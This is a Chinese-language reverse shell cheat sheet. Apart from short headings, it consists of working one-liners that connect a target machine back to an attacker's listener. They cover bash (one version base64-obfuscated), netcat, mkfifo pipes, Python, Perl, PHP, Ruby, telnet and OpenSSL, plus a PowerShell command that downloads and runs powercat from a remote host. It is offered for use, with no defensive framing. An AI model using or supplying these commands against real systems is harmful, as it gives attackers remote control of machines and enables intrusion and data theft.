开启监听

1
2
3
nc -lvvp 9999
# or 
nc -lvvnp 9999

bash

1
2
bash -i >& /dev/tcp/ip/port 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}

nc

1
nc -e /bin/sh ip port

如果 nc 没有 -e 选项的话

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.144 1234 >/tmp/f

exec

1
exec 5<>/dev/tcp/192.168.204.144/1234;cat <&5|while read line;do $line >&5 2>&1;done

python

1
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

perl

1
2
3
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

php

1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby

1
ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.204.137","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

telnet

1
telnet 192.168.204.144 4444 | /bin/bash | telnet 192.168.204.144 5555

openssl

1
2
3
4
5
# 攻击者主机上生成密钥并启用监听
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port port
# 目标主机上执行
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:port > /tmp/s; rm /tmp/s

powershell (win)

1
2
3
# 攻击者主机上执行监听(使用Powercat脚本)
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://x.x.x.x:port/powercat.ps1'); powercat -c x.x.x.x -p port -e cmd
# 目标主机上执行(假设可以下载并执行Powercat脚本)

Python 创建伪终端

1
python -c 'import pty; pty.spawn("/bin/bash")'